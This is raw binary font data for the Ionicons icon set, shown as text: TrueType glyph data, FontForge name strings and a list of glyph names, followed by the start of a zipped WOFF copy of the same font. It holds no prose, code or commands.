#$'&$%8P88Px/B//B��	!+3;CKS[cmu}���%2"&546264&"&2"&4264&"'2"&46264&"$2"&4264&"&2"&4264&"&2"&4264&"%"&5462&"264&2"&4264&"&2#"&4264&"K.  {,,%  f.  $..&  {,,%  }..%  ;.  �,,%  }.%  k.[  F..<  F.[  �,,;  E,,;  E,,;  e.[  %..=  E.=  	��	#+3=EO%2"&546"2"&4'2"&46$2"&4&2"&4&2"&4%"&5462&2"&4&2#"&4K.�,,V...k,,m..K.�,,m.k....�,,,,,,?.k...�� �9=AE#54'&'&54627654'&"35'335733476761453'53'53 �UvU1($h$(   ~@P```)*&31!*):SS�%$1($$(1$%$'p@@pp@@p&%�  �� �#'+#57##5'##54'&'&546253'53'53       UvU�@P```)*&3�@@��@@�1!*):SS��  ��!!!535353$424242p��`���������     p��p���h``�  `  `  ��!!624"424"424"5#75#75#���@      ��������P @ @ �``�� �!)"67654&2.5462"&4264&"�lJF!!F�xTH$$0Pv4&&4&,((�J6Bx9""9xB6ZT<2�33E�2<&4&&4I((�� �2.54264&"TxTH$$0P|((�T<2�33E�2<k((��@�#'%3!535462#354&"5!62#5&5424"8��8=V=��3J3��  ���H+==+HH%33���Р!! ��@�#%3!535462654&"3754&"2"8��8=V=`P3J3H  ���H+==+�!�H%33%HP ���+.12'7654&#"'7>7#"&54?326'3%7VzlL1Va�a8VzlL1V�@�@@@�zV
Ll2,19��19zV
Ll2�@@@@����-3%'771'65.#"'>32#"&'=47326%''�45
+nM3X`7Tw(`7SwoM3X��4)*�55))Mn4,08wS^08uSMn4�5))l�#'#5'7'7537'7'5#'735lvv v@v vv v@v
��� ���� �DD8E��E8DD8E��E�JJJ��JJJJ��Jl�'#5'7'7537lvv v@v vv v@vDD8E��E8DD8E��E��,487#+;3=;5+573##5#53573!354;2354+"!� 00 00@@@@@p��`�c��a���0 00 @@@@@@@@��@  �� ���� (47;+#=+5;=373!354;2354+"5#5##335�00 00 @��`�c��a�@@@@@� 00 00���@  �@@@@@@���
07'"&=7'632'6=33#535.=3327
���!.q=�(!.1
uE�I2FA-	 ��Hw0#v�S
� 1#�)" P�??I2PP-@���/2"&=454&"26733#535.=3265_B..B.�%4%%4%0C2E�I2FAZA�1#�#11#�#��((�((jP2I??I2PP-@@-���#6"&=462733#535.=3265�B..B. C2E�I2FAZA^1#�#11#�#qP2I??I2PP-@@-��%!5!������2"&4264&"75!z�zz�z��pp�p?�z�zz���p�pp�F����2"&45!z�zz�zP��z�zz�_ �`%#3!535#!!�@��@��0�@ � �`%#3!535#!!5!�@��@��0��P�@ ����M�3"727#"&546767327.547�
"60D-$@-J&1C;�)C0'=-@(H11):M�3727#"&5467673�
"60D-$@-�)C0'=-@�@�'/6"264&2"&4&"264&2"&4$"264&2"&4�


 X


 (


 �








�@�62"&4&2"&4$2"&4�n��r/547632�I>3ZZA
�,'@r%5472>355476357@
>4	�?4�1,'� �
-'�#����"264$2"&4%5#�rr�r��zz�z0`��r�rr��z�zz�
�����2"&473z�zz�z�`��z�zz���`����1u�%'&#"#"&547673276/>73276/7632654/5/&#"#"'5#'1#"'1'32?'#&7162367'?7&

37&s	!	=$!

NE

	,	eXfgG?[�


%(#T5b(
O$	E
'FJA�<{o5����*1%'&#"&5474>76/>76/76327'77'	
37&r			=$!

NZgF2C�	

&( #T

b(
O^;yU&��"&*!#!"&53#3!265!#535353530P
��
 	B	��0��������

1��		Q��@0PPP��!#!"&533535355#75#0P
��
 0���0������

1��   �`� @`	5%'77'@�9)s�Sƚ��sS�y$ @`5%7'@�֒4ƚ���h �`%CW5353'77'7'77&54632&#"7""#;264&#"#'&'&'232+"&5467546��7
 � �
)'* �%

�*&&�.*66jk  �+*!%)%

(#&6'  . �`';5353'77'7'77232+"&5467546'#5&54632��7
 � �
�*&&�.''**66jk  �a#&6'  ./	+* `#3##3#?//O�//OP��0��@��0��@ `5333ObO @��@��
|�0?Qa{���%#"'.7>326'&'&#"32%#"&'&767632>'&#"327.'&7673"'3676'.'#2#".'&"#"'&54654'&'&"327>362232'&'&7>73'3>76'&'#|





��





E 




`P

�$,$





 

	

�-E$!@-T!$ C($%(w#�^7!

!7W	/,

,/	
		�(%$'M#|�!3M]%#"'.7>32#"&'&767632.'&7673"2#".'&"#"'&547&'&7>73|



��


3 

	`P

�

 �-%-($%(^7!

!7|(%$'0�P<|���+476767654'&'&'.5&&'&7>6';&'.'.'&54656767676'&76'.'+472>75'?6547632"#67&74;27&6'&#"32&'&'*&767675"'&'&7>"#';.'&'4327&6'&#"32�]�
'$!�	�	
>	
	7).Z2	

Q
	P�#$	


		

 		 	

		$%	#

.	2	
	X
 
.	2	0�P<?v�%1+476767654'&'&'.5&&'&7>6''3++472>5'7>56547632"##36%#&'&'*&767675"'&'&7>"#=�
'$!�
7)3P2	

q#$	


		




		%%	#


	X
  @`1�7+47>76?&/"'.54673&'&62#3&'&'&'".#&'&575?>76?>57676&575>54'&#"j�5��5 (F(	 c�	


	��  )
 
))*	%'

	
	


 @`0%+47>76?&/"'.54673&'&62#5��5 (F(	 T  )
 
))*	% @`=�##5#5353+47>76?&/"'.54673&'&62#3&'&'&'".#&'&575?>76?>57676&575>54'&#"@��5��5 (F(	 c�	


	'1�  )
 
))*	%'

	
	


 @`<##5#5353+47>76?&/"'.54673&'&62#@5��5 (F(	 '�  )
 
))*	%��!!%!!#5!3#@���p��P��� 0@�� ��p0 ����	!!!#@���@��0@���0��@����)5327>7654'&'2#"&'7'1?.'54>3�	3?'$#481WVzzVDn� 0%$.��
1X9o�-%4#$'P81z�zP?1�6I& .��4-$F?&����	2#"&'7.'54>3�VzzVDn��
1X9�z�zP?1�4-$F?&����'J+"&54654&5476;2'3&/&+"546454'&547654&5#;2� 
�
 z��z�	�	
�
3\&A

C&\3W&

&33�c!(*,.11.,*)!
����'+"&54654&5476;2'3&/&+"� 
�
 z��z3\&A

C&\3W&

&33 `7'
���C������ `
�`��@@%##5#53533xwwx�wwxx����2"&4264&"73##5#535z�zz�z��pp�p�xxww�z�zz���p�pp��xwwx����2"&45#5##335z�zz�zPxww�z�zz�_xxww����	'5#"&462&"2������  ���� ����( ����42'3'$264&"0 P���40  p��ࠠ����#3''3?=#%5#"&462&"2� ����ى���
~  ����� �W�i��wyp�) ����3''3'$264&"42��
���2 ����

� p���  ��/2+!5#"&=46;5!%!55#%54#!";5!32�0�0  ���0��00P
�rr�
00   �������^^��35!!5!5!2+5!#"&=463P��� !

!��
����`  
�
~~
�
����&%2#"'#"/+"'+5376327623>�!32
3-
pc=4-&�(/�4� �
�ƛU����#%2#"'#"/"'+537627623>�A9:6`Z>:6;�H�Z�����[0 P8V2#"54?##"54?##"5?##"54?.4674&5463226264&+'&'&#"";1�(7.#	%5	.$ -% +'|
*$PB,#LB,"!,%$0'{*!
(
0 P82#"54?##"54?##"5?##"54?.4674&5463226�(7.#	%5	.$ -% +
*$PB,#LB,"!,%$0'P�0#+3;C2#!"&4623&54264&"264&"6"264&2"&4&"264&2"&4D\@@.��.@@\@5�5�7N66NN77N6o((J4&&4&�((J4&&4&0A^AA^AA/>!!>/P77P7�7P77PX((,&4&&4((,&4&&4P�0#+32#!"&4623&54264&"264&"62"&4&2"&4D\@@.��.@@\@5�5�4&&4&&4&&4&,((�((0A^AA^AA/@@/o&4&&4&&4&&4J((((0�`=4767557">37'12]��.)'$�)B'#WF��0 V24P��P;�$%
	;.Aaa0�`=47675512]��.)'$0 V24P��P;@l6"&46355"2653�jKK5``-??Z?@KjK,@88?Z??-5����"%3"&46355"26&2"&4264&"<KjKK5``-??Z?¬zz�z��pp�p�5KKjK,@88?Z??�z�zz���p�pp�����2"&4265#"&4637'"z�zz�z�jK?Z??-``5K�z�zz��K5-??Z?88@,Kj��27'74&"3267#"&4p�p7	FC	3i�iiJ;]c?Pp�pP5	DD	4Jhi�iC6:Ip�0�P <_?"&'#7#273'3.#"'763272#!"&=46;533>;254+"'.'./#"+"3!2�B2&')4"&'(!#

��

"
XL>X	<@�. 22%�%33%
�

�
ϰ		�
0�P*<2#!"&=46;533>;27'"&'3'32?#&'&#"7632#b

��

"
X+4)'&2B.&#!( 
�

�
�%22 .-3%%@�@'=77''���ర���%ee�dd_j{{�{{�@�@7''����@{{�{{���@�-<HR]dl276764'.67"&546767676%>7>767.'&'6767&''&'>7'67&'&'6	61-	#v#	2"O�O./'
36��
PB1
�
'	;$?:B�#-
'	.
  
.%73+JU8HH84?	
"1
	)
XH		
! $(��@�(0"&546767676%67'&'>7'&'6@"O�O./'
36��B1
�?:B�#-
@+JU8HH84?	%
XY "(��%'#"&462'&"2764l"l(+?YY~YC#dFFd#$�m"mZ~YY?,�#FdF#$b��
%'#"&4623264&"�q)7?YY~Y!�'98PPpPq!Y~YY?6)'PpPP89�p#5!623#"'!5362!!"'#5!623#"'!
6
[[
6
��[
6
��
6
[
6
[[
6
��H � � �h#+3;CKS"2&2"&4"2&2"&4&"2&2"&4!!464&#533#464&!5!3#464&'!5P  0  �  O��_QQQQ_��^QQ^��X 0�� 0� 0�����'5F"#5267>73467>;'7'7'7#"'7;/.#524&'#.-0%#!*#3-:%4cc3cc4^;=03�3#*"!(, ? $0!$3+TR*�RT+_!.2*V0$ <��!5H%'7#"#5267>7>;'74"5.'.#52'7#"'>5>7;'*
>./%	$('7%3.>
V�7'($�VV
>.Z;?2.>�34 6#144HT1#�GH4_-33 @`37'#7'3=O��OP��G/`������������~~ @`37'#O��O`������ @`3#57/#�OO��� /`����@���� ~~ @`3#5�OO��`����@�0�P�7/'&7''&'"=&7675'&76''&?&'&767''&767'&766'&765&'&65426767&7676'&'676�	@		
A	

AA	A
		@
@@

�$I
!!
I$	$%
	$I
!!
I$

$$
��G[c2/&'&".'&5467#53&'&'/#7&'&'#51'3#626'#"''7&54632264&"���8
#&V&#
8�  !)'!$  @�@AK	

	
)��]T@

@T]�!((!
&&!)'!!@@�T	H��.BVpt%3&"&'&';5#6767?1'6767;57#4'7'&#"7326&2#&"#.'&54654'&"5?>27&42�
=�=

$ "$!q	?I
	

���85�58{4=<�<=4
	HLH	�@�"::""  

""
" "
LA	�]T@@@@T]�9OT=<<=TO9
		o@@����	7'373''7#���55��6���k+l��b��b�cck�LzK����	%'7'37'7#'#7��6��6��556+l�))�l+k�b�cc�b���zK{{KzL����	%'7'37��6��6��55�b�cc�b������!+9"&54?#'7673535'7'#264&#"7'&546753N2q�q3)	2B A0	)	ԐeeHGf�	-7INooNK6(	1&&+	(��d�deFGY
�����!/"&54?#'7673535'7'#654'5#N2q�q3)	2B A0	)	�	-7INooNK6(	1&&+	(���

 @`'/5353753!53/'776"&462&"264�_8��<�"!�""�!"�"!�@,,@,40##0#(88��<<�5""�!""!�"" ,@,,@[#0##0	 @`'5353753!53/'776"&462�_8��<�"!�""�!"�"!�@,,@,(88��<<�5""�!""!�"" ,@,,@Pp0\%#"'&'&'&76?63223276326&'.#""'#&/&'&'5&'&6/&#"326P'6+#-"	
		
3

."0

 ,-5p$($/<8$E

	,9	
1;-  &Pp0%#"'&'&'&76?6322327632P'6+#-"	
		
3p$($/<8$����#-9%++"&4624&#"#46%;.'>7.'�jIVzz�zpO@%!#��pO@H�B_VzB]Ux�Igz�zzVOp#!%@OpH@�]BzV_Bx����*853211#"&=1471>7163127.'665&'.'&'"�VzjIVzgI
�H@xU�zV#!%@���zVIgzVIj�@HUxcz@%!#0P:77#7372+53264&+'&'&#""#;#"&546754632�X4H8&&%

. *��`P0c&6'(
$	
  .#0P"737#73'3;3264&+.#";�(B4HUk!&&* .� ``P00'6&#.  ����#'+/37;?CGKO`2"&46764'.'&"274242642 426424264242&4242&42427"='&7'&62������T>>#&V&#>>#&V&Y���H�0�� P�^%&	��������>#&V&#>>#&V&#>h��������������zz??����$+/DKRY`d2"&46"224"6'&76'&776&6'&24"76'&#'&3256'&6'&6&&6'&24"��������$
9T	&%TC������[�g�Q���@?z7��\����)7'.613#"72"&472654&'#5�&=
Vzz�z=8o�oeJ�4#+�z�zz�=8OPooPKn_p����+2"&473264/2654&#35"&547'z�zz�zf+
^�ppPB\f�g38�z�zz�<
�pOPp`NdCHffHI38�����'/7CO6"264&2"&4%#"3!264&'2#!"&463$"264&2"&4'"3!264&#%!2#!"&46t((J4&&4&?�!//!!/0 (88(�(88(((J4&&4&�!0/!!//!�(88(�(88�((,&4&&46/B//B/8P88P8�((,&4&&46/B//B/8P88P8����#/762"&4%2#!"&463264&"$"&462"&463!2#6"264L((0(88(�(88(4&&4&T((��(88((88(4&&4&�((L8P88P8�&4&&4�((L8P88P8�&4&&4 �)-15#+"&5#53546;2'354+"#;25'537#7##' �PFqbF���]9
cO��#��"��������� �#'+3#+"&5#53546;2#354+"3'#5#37#�P�PFqbFG<O��#��������0�`%#'&'&''74.#552�
$').��[41$Q8��FWP ;P��P42O:,%AaaA.0�`%#'&'&''7�
$').��[41P ;P��P42��@�#'62#5&5424"'3!535462#54&"5!�  H���8=V=3J3��!! P��H+==+%33%������@�#62"'3!535462#54&"654&"3�  H���8=V=3J3`� p��H+==+%33%�!@�3!3#!#/7'#5�����p p_JJ70��0��*JJ7��@�3!335#5'7�����7JJ0��0��QQ7JJ@�@#'2+"&=46354&+";26?'7��
��	/bbQ@@@��ݼ		��5�5m!B!@�@2+"&=4637'�bb@��U5�5@@@'64''64'7'64'7'7'#5**''( O

�FF:@:�:
6�6�
'^'
+j
@
HL8�8P`� ?'#5:FF:�8�8P����"473+5354'&'&=47;'3&'#2767676=#hHPPH(
 @@ 
(=�5
	
�
	��� 	
, `` ,
	 �AA�
%%
����"73+5354'&'&=47;'3&'#hHPPH(
 @@ 
(=�5��� 	
, `` ,
	 �AA����")06;AGNU[agm2#1"&4633&''67.'#&'3#67&'#67&76753>7&'567#367'3&'7&'6'6&'67&'�VzzVVzzVK
&%
!$$'
L\	([[("	
"$$!
%  
K\
!([[("	&(3�5&$C(3�3(�z�zz�z|L.&"+	I&.5#0AA0#5.&K\I	+"&.1'0AA0#I(2	A(	0��(0
@(
	2����#(.5;AGLRX_dkrx2#1"&463264&#1"3#56''67&7&'&'67#67&'5&'3&'6767&'6673&'#67&'67&�VzzVVzzVPooPPopOBD! G#�1%�#T"KD###1$�"�T%c "YS%%22�z�zz�z�qo�ooPOp-Da
A@R
-�."-:1D-DL1D`@N-$H.	
#�".:-A
,$:-h."-:r
	.
����!)��"&5475462#6254&"264&"62"&465#534''7&''7&''7&''7&##=''''3#7777=367'767'767'767'742@@p�p@KjK�.d.8P8�^^�^dxTTxT




	
		

		


	��9VPppPV915KK5(88�x^�^^��TxTTx]







	
	
	


7������%&72&'6546$1'&=6&'#"5&?67v):	LM".M.�24&;����:,@

$'8�.�	:&21������	7'7'"&5467p :�Ƙ�nnJ=$2#� ������nnB!##1����%-5N%'&'&'&'&'&76''&'&7>&2"&464&"7#"'&#"#"'&7>2o	
	
2�
	
		2	�����0pp�pp�	
0"
	/:/�
		
΃������p�pp�pY
		
����?'''##'3'�'��'��.��.8z(���T*�E�PP�eP��``�88��`Y����?''3373�***�.��.8(��(z�YY�P��``���8����$/2"&47">;.4&"2'7#"/2654'#�������X561 �S'8''8�XB62N�Ji
l 
������WD]))0�8''8'CDe]-�(�iJ%&���� .C6462"7#"'157654'3&'27&'&54767'5676323&'##"�'8''8�bL

f
 ��N>.C
gr&4%&6] 


� 1�8''8'iOz�&			��
.A_0(�,�)
0*)
����#/2<HRU]e%'.'&=47>76'?'7>765754'.'&?&'&7'&75&"264$2"&4dR	QQ	Sd(u>" gI'l'"']&f�pp�p�㺃����Q
8
6P	6

8'6>)!(h5M>!(�p�pp�������	����
+.6PZ]7&'76''&'77&='./67>7662"&454'.'&7>76'6547>7'7�>''"] D]((''s�����kS	QQ	RO&]=�5):>36?	�������Q
8

6	P6
8
 >3����%/31?#'37#'3%!'%!#cb056py����#����QN(@231S�m--[��$����7!'%7#3#31/#���#����yp650bm3�m--D�132@(N��@�;a"+;+;327'#"'&=;7+=;7+=476327&'2&#"3#3#327#"=#535#5354�O$!""""!$O1'54gjvx33'173	7'-"��|u!.'7	37�2222�202#*
0%#A	000"	Au000u��@�%73#327#"=#535#535432&#"3#�|u!.%8
37�2222�73
8%-"���0
"	Au000uA	0����	!'%!/3#3/3?�#����l
���bc065��m--[��$��23�M'@����!'7#3/#?#'�#���
�560cb���m--2�@'N�3�pGf##"'327657#"'7326="#"'327654'&'1.5476327&'2&#"#"'73254&'&546�03y�3(#
')<'
 "1$ #$UDA7$&+4]EX�*?�Ճ>&�& '

 
@ F.<?&"D,:�p+#"'7326=72&#"#"'73254&'&546�y�1$ #$UDA7$&+4]EhՃ>&�@ F.<?&"D,: �`"2#!"&54635#'#35737#5##����8**88**�F*8*`���DD�`66````����<g"/&76762?6=4/&6=4;2#"/&=4?67"&54;23254&'.4632+"5&#"#�5'���()��� -'/$#$'"K,)#( *%  \�^^���
�
_

_
�
^{"

23		 ��Mj72#"&547632#"'&54767##'"'&'&'&'&'&547&767632676?654'&'&#"&#"&#";2�
	

	
		�
		
				~"		$@
	"
,D()"


B**2	)%VT�



$

s&:**;%'/'��=$	%>��&/QZ7#"&'&=46;5#5467632+3"7254#"+3'&=476;263>=32"3254�"&`"!h
'`.3.1!h!�
� +'
(79"	y
`
(5!!6! 	"&#�
n�����%'&76'&'&'&7&''&7>76'&''&7&'&7&'&767.'&7>&'&6337676'&>76726>7>7667676616'767676&766'76'6
"&	
!	 
	

<4< P^&%IK
D7hT0
	




<%�t+hQMw



$
*
	.
(1%#	,
5+, 

32)-%`8
����e����1""'&#"032636322>76322327457464>7>?&'&54>765&#"#'676.267632"###"'"&#&#""'.'&#""##"'&'5"'".#&'&=767654'&'.'&7>32&'&7"'&6276&42242�7F) 	.)	
Fy�'%
$&	%D%

'$

%�B2x @ �J6
#		
'
		'

	#
6J-+:		"


"
;+�0000����nv��%"###"'"&#&#""'.'&#""##"'&'5"'".#&'&=767654'&'.'&7>32&'&76267632$"2646&"'&26264&"�	%D%

'$

%'�'%
$&��			X2B			X


"
;+--+:		"�@5����	!##5#5!373'53#53 �pP@@`p��P@` 0�0���p@@0���@@P��������	
!##5#5#35# �pP@@`�0�0���p@@0���������3HU7>76&'./&7676;26"?327654'&2#"'7&54�	
 
	$
	��97=
+0M877ඁ�[73z( &	
	O77L4,
967ML7W�'u5<[����@2#"'7&546'&'.'&'&'&'&?676'4.'&+"7>����[73z( I
 
		
$	��'u5<[�
	����33#3##5#535'#53'37#?#'##3#33535#573�p0IXXPXXJ0pPpp;
c+zz+c
;DXX0XXC��00``00�������,$``%+����3#3##5#535'#53'37�p0IXXPXXJ0pPpp��00``00�����@�!6DEGY"&462&"264267"&=.=5#"&'#&'3276="'36236#37"&'&575265�^^�^kjIIjI��\W�W- -%56%4�6.@.K�SjSV�V0&4&&4I$$f&!�%%�	�PP
w[[�0



%%��@�7K4 "&=27676765'265."&'&=&5"'&'&57526@^�V
.$-�B^. ./.�)*h*)V�V0����$�

��$	`` �



$$���2:3#53##5#535.547''7'#53#76327#264&"p�(e
<,HH0HH-;
$!$.(�F+$!$&3* 	]F�B//B/��Ld/G4.@@.4G/$!$-L�(*$!$$\��/B//B���� ?3'7'#1&7'!'72�h'&�&'h
"3s� @��@ �,+j &��& F0X��!X0'����'!'727� @��@ �,+`X�� X0'(�D���$I���	�	�	�	H�	n	 �	�Created by Adam Bradley with FontForge 2.0 (http://fontforge.sf.net)Created by Adam Bradley with FontForge 2.0 (http://fontforge.sf.net)IoniconsIoniconsMediumMediumFontForge 2.0 : Ionicons : 4-12-2014FontForge 2.0 : Ionicons : 4-12-2014IoniconsIoniconsVersion 001.000 Version 001.000 IoniconsIonicons���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������������������������������������������������������������������������������uniF100uniF101uniF102uniF103uniF104uniF105uniF106uniF107uniF108uniF109uniF10AuniF10BuniF10CuniF10DuniF10EuniF10FuniF110uniF111uniF112uniF113uniF114uniF115uniF116uniF117uniF118uniF119uniF11AuniF11BuniF11CuniF11DuniF11EuniF11FuniF120uniF121uniF122uniF123uniF124uniF125uniF126uniF127uniF128uniF129uniF12AuniF12BuniF12CuniF12DuniF12EuniF12FuniF130uniF131uniF132uniF133uniF134uniF135uniF136uniF137uniF139uniF13AuniF13DuniF13EuniF13FuniF140uniF141uniF142uniF143uniF144uniF147uniF148uniF149uniF14AuniF14BuniF1F9uniF1FAuniF1FBuniF1FCuniF1FDuniF1FEuniF1FFuniF200uniF201uniF202uniF203uniF204uniF205uniF206uniF207uniF208uniF209uniF20AuniF20BuniF20CuniF20DuniF20EuniF20FuniF210uniF211uniF212uniF213uniF214uniF215uniF216uniF217uniF218uniF219uniF21AuniF21BuniF21CuniF21DuniF21EuniF21FuniF220uniF221uniF222uniF223uniF224uniF225uniF226uniF227uniF228uniF229uniF22AuniF22BuniF22CuniF22DuniF22EuniF22FuniF230uniF231uniF232uniF233uniF234uniF235uniF236uniF237uniF238uniF239uniF23AuniF23BuniF23CuniF23DuniF23EuniF23FuniF240uniF241uniF242uniF243uniF244uniF245uniF246uniF247uniF248uniF249uniF24AuniF24BuniF24CuniF24DuniF24EuniF24FuniF250uniF251uniF252uniF253uniF254uniF255uniF256uniF257uniF258uniF259uniF25AuniF25BuniF25CuniF25DuniF25EuniF25FuniF260uniF261uniF262uniF263uniF264uniF265uniF266uniF267uniF268uniF269uniF26AuniF26BuniF26CuniF26DuniF26EuniF26FuniF270uniF271uniF272uniF273uniF274uniF275uniF276uniF277uniF278uniF279uniF27AuniF27BuniF27CuniF27DuniF295uniF296uniF297uniF298uniF299uniF29AuniF29BuniF29CuniF29DuniF29EuniF29FuniF2A0uniF2A1uniF2A2uniF2A3uniF2A4uniF2A5uniF2A6uniF2A7uniF2A8uniF2A9uniF2AAuniF2ABuniF2ACuniF2ADuniF2AEuniF2AFuniF2B0uniF2B1uniF2B2uniF2B3uniF2B4uniF2B5uniF2B6uniF2B7uniF2B8uniF2B9uniF2BAuniF2BEuniF2BFuniF2C0uniF2C1uniF2C2uniF2C3uniF2C4uniF2C5uniF2C7uniF2C9uniF2CAuniF2D1uniF2D2uniF2D3uniF2D4uniF2D7uniF2D8uniF2D9uniF2DDuniF2E0uniF2E3uniF2E4uniF2E9uniF2EBuniF2ECuniF2F0uniF2F4uniF2F5uniF2F6uniF2F7uniF2F8uniF2FCuniF2FDuniF305uniF306uniF30AuniF30BuniF30CuniF30FuniF313uniF314uniF315uniF316uniF317uniF318uniF319uniF31AuniF31BuniF31CuniF31DuniF33FuniF340uniF341uniF342uniF343uniF344uniF345uniF346uniF347uniF348uniF349uniF34AuniF34BuniF34CuniF34DuniF34EuniF34FuniF350uniF351uniF352uniF353uniF354uniF355uniF356uniF357uniF358uniF359uniF35AuniF35BuniF35CuniF35DuniF35EuniF35FuniF360uniF361uniF362uniF363uniF364uniF365uniF366uniF367uniF368uniF369uniF36AuniF36BuniF36CuniF36DuniF36EuniF36FuniF370uniF371uniF372uniF373uniF374uniF375uniF376uniF377uniF378uniF379uniF37AuniF37BuniF37CuniF37DuniF37EuniF37FuniF380uniF381uniF382uniF383uniF384uniF385uniF386uniF387uniF388uniF389uniF38AuniF38BuniF38CuniF38DuniF38EuniF38FuniF390uniF391uniF392uniF393uniF394uniF395uniF396uniF397uniF398uniF399uniF39AuniF39BuniF39CuniF39DuniF39EuniF39FuniF3A0uniF3A1uniF3A2uniF3A3uniF3A4uniF3A5uniF3A6uniF3A7uniF3A8uniF3A9uniF3AAuniF3ABuniF3ACuniF3ADuniF3AEuniF3AFuniF3B0uniF3B1uniF3B2uniF3B3uniF3B4uniF3B5uniF3B6uniF3B7uniF3B8uniF3B9uniF3BAuniF3BBuniF3BCuniF3BDuniF3BEuniF3BFuniF3C0uniF3C1uniF3C2uniF3C3uniF3C4uniF3C5uniF3C6uniF3C7uniF3C8uniF3C9uniF3CAuniF3CBuniF3CCuniF3CDuniF3CEuniF3CFuniF3D0uniF3D1uniF3D2uniF3D3uniF3D4uniF3D5uniF3D6uniF3D7uniF3D8uniF3D9uniF3DAuniF3DBuniF3DCuniF3DDuniF3DEuniF3DFuniF3E0uniF3E1uniF3E2uniF3E3uniF3E4uniF3E5uniF3E6uniF3E7uniF3E8uniF3E9uniF3EAuniF3EBuniF3ECuniF3EDuniF3EEuniF3EFuniF3F0uniF3F1uniF3F2uniF3F3uniF3F4uniF3F5uniF3F6uniF3F7uniF3F8uniF3F9uniF3FAuniF3FBuniF3FCuniF3FDuniF3FEuniF3FFuniF400uniF401uniF402uniF403uniF404uniF405uniF406uniF407uniF408uniF409uniF40AuniF40BuniF40CuniF40DuniF40EuniF40FuniF410uniF411uniF412uniF413uniF414uniF415uniF416uniF417uniF418uniF419uniF41AuniF41BuniF41CuniF41DuniF41EuniF41FuniF420uniF421uniF422uniF423uniF424uniF425uniF426uniF427uniF428uniF429uniF42AuniF42BuniF42CuniF42DuniF42EuniF42FuniF430uniF431uniF432uniF433uniF434uniF435uniF436uniF437uniF438uniF439uniF43AuniF43BuniF43CuniF43DuniF43EuniF43FuniF440uniF441uniF442uniF443uniF444uniF445uniF446uniF447uniF448uniF449uniF44AuniF44BuniF44CuniF44DuniF44EuniF44FuniF450uniF451uniF452uniF453uniF454uniF455uniF456uniF457uniF458uniF459uniF45AuniF45BuniF45CuniF45DuniF45EuniF45FuniF460uniF461uniF462uniF463uniF464uniF465uniF466uniF467uniF468uniF469uniF46AuniF46BuniF46CuniF46DuniF46EuniF46FuniF470uniF471uniF472uniF473uniF474uniF475uniF476uniF477uniF478uniF479uniF47AuniF47BuniF47CuniF47DuniF47EuniF47FuniF480uniF481uniF482uniF483uniF484uniF485uniF486uniF487uniF488uniF489uniF48AuniF48BuniF48CuniF48DuniF48EuniF48FuniF490uniF491uniF492uniF493uniF494uniF495uniF496uniF497uniF498uniF499uniF49AuniF49BuniF49CuniF49DuniF49EuniF49FuniF4A0uniF4A1uniF4A2uniF4A3uniF4A4uniF4A5uniF4A6uniF4A7uniF4A8uniF4A9uniF4AAuniF4ABuniF4ACuniF4ADuniF4AEuniF4AFuniF4B0uniF4B1uniF4B2uniF4B3uniF4B4uniF4B5uniF4B6uniF4B7uniF4B8uniF4B9uniF4BAuniF4BBuniF4BCuniF4BDuniF4BEuniF4BFuniF4C0uniF4C1uniF4C2uniF4C3uniF4C4uniF4C5uniF4C6uniF4C7uniF4C8uniF4C9uniF4CAuniF4CBuniF4CCuniF4CDuniF4CEuniF4CFuniF4D0uniF4D1uniF4D2uniF4D3uniF4D4uniF4D5uniF4D6uniF4D7uniF4D8uniF4D9uniF4DAuniF4DBuniF4DCuniF4DDuniF4DEuniF4DFuniF4E0uniF4E1uniF4E2uniF4E3uniF4E4uniF4E5uniF4E6uniF4E7uniF4E8uniF4E9uniF4EAuniF4EBuniF4ECuniF4EDuniF4EEuniF4EFuniF4F0uniF4F1uniF4F2uniF4F3uniF4F4uniF4F5uniF4F6uniF4F7���=��Ц3�Ц3�PK!��@	@	-it_sanctum/fonts/ionicons/fonts/ionicons.woffnu&1i�wOFF	@
��FFTM	$m�	�OS/2�J`A9a�cmap\��mncvt ,Dgasp	��glyf
���p�"&head0.6k��hhea`$��hmtx�o~A
Iloca0�”�)�maxp�  <�name�x[���npost��Fʙ���x�c`d``bU9�x~���L pa����� ��,
��	sx�c`d``<��IF�tQs��r@.x�c`a�a����������2H2�0001�13�������p�#��`�c<��fDR���}
�xڍV;r1m����ĜB!E�!�8���@E@Q.n@2�B�[d��֧%=���]~�^I-��uk�'=��wMd62��H&�6�XdJsn/�=�#��y�;L�
�E�K�Yv`ژƵ`!�'�u�d�l�=g2r<B9?�Mg��[�)��u^G�{��-�<�f��߻	���+c�'g;���%�3D�_Z�d�~1�<1n�slA��B��)��ƸD{M����k���nJ�8�yA���c��
f2����smj�vz/B��>�e�=��I�'ͽ��նϑ�^�$@�ۚ�+�+w�f�i��}�
1]꺇u'�o!g�{*_�Y?���T��Z/���n���|_�ev"p��J�`�z���ך��'�=ox>��܄M�.��]_��+��x
5~�=��l�w�|.�t.�{����k���X*�L�=�*d��[��2,�ꭂ�`?���B���~{�����I�8��6�'|d������J��A���>���\k��%����f����_�S����_�g�7#��m2�h3|+
=Nj3�<H�'o;�_�(7;�������8Z�H�m�9���54�{�q�С�Tڬ|��<��V�#x�c```f�`F��1��,7����%����G��ޟj?�t���O�>]�t���O>=���ӛO>���3�g���e�|�����#�Gˏ��?��4��>����.~�����5PϗO>�~���l��??3??�?�@>+>s>3>S>}>]>->
>5>%>E>9>i>	>A>>>>N�P7�������agV�D***Rd���� HXv������Hf��$r��:Z��
Z���.Pr�$R���	&	�	�	�	�
X
�
�
t���$n�
f
�
